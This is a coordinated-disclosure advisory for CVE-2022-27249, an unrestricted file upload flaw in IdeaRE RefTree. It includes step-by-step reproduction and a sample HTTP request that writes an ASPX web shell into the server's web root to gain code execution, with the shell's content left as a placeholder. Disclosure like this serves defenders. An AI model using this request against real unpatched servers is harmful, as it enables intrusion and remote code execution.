CVE-2022-27249: IdeaRE RefTree Shell Upload ≈ Packet Storm

===============================================================================                  title: IdeaRE RefTree Remote Code Execution                product: IdeaRE RefTree < 2021.09.17     vulnerability type: Unrestricted File Upload                 CVE ID: CVE-2022-27249               severity: High           CVSSv3 score: 8.8          CVSSv3 vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H                  found: 2021-09-13                     by: Savino Sisco [email protected]===============================================================================[EXECUTIVE SUMMARY]RefTree is a web application made for managing complex real estate situations.Among other features, it offers the possibility for authenticated usersto upload and download DWG (CAD drawings) files for buildings.During a penetration test activity, an "Unrestricted File Upload" vulnerabilitywas found which leverages the upload feature to upload a file anywhere on the target system.By uploading a malicious web page, like an aspx web shell, to the server'sweb root it is possible to achive code execution by just navigating to themalicious page with a web browser.[VULNERABLE VERSIONS]IdeaRE RefTree < 2021.09.17[TECHNICAL DETAILS]It is possible to reproduce the issue following these steps:1. Log into the application to get a valid session cookie2. Get a valid "ObjId" from the application (the ID of a building to associate   the file to)3. Use the API endpoint '/CaddemServiceJS/CaddemService.svc/rest/UploadDwg'   to upload a file on the target system, for example a web shell in the   server's web root4. Navigate to the new page with a web browser to trigger code executionExample of the HTTP request to the Upload endpoint:POST /CaddemServiceJS/CaddemService.svc/rest/UploadDwg HTTP/2Host: [REDACTED]Cookie: ASP.NET_SessionId=b1125gke23enpul1ukeu1ouyUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/jsonContent-Length: 2211Origin: https://[REDACTED]Referer: https://[REDACTED]/Reftreespace/{  "FileContent": "[BASE64_PAYLOAD]",  "DwgName": "C:\\inetpub\\wwwroot\\webshell.aspx",  "UploadType": "WorkingCopy",  "ObjId": 4774726,  "ObjType": 5,  "UpdateState": true,  "DwgOp": 23}HTTP/2 200 OKCache-Control: privateContent-Type: application/json; charset=utf-8Server: Microsoft-IIS/10.0Access-Control-Allow-Credentials: trueAccess-Control-Allow-Origin: [REDACTED]X-Powered-By: ASP.NETDate: Fri, 10 Sep 2021 15:00:53 GMTContent-Length: 24{"UploadDwgResult":null}[VULNERABILITY REFERENCE]The following CVE ID was allocated to track the vulnerabilities:CVE-2022-27249[DISCLOSURE TIMELINE]2021-09-13  Vulnerability disclosed to our customer and the vendor.            Vendor acknowledged the issue.2021-09-17  Vendor released a fix for the software.2021-10-15  The vulnerability was rechecked in the newer version to confirm             that is was indeed fixed.2022-03-15  Researcher requested to publicly disclose the issue; public            coordinated disclosure.[RESOLUTION]Update the software to a version >= 2021.09.17Savino Sisco <[email protected]>https://www.linkedin.com/in/savino-sisco/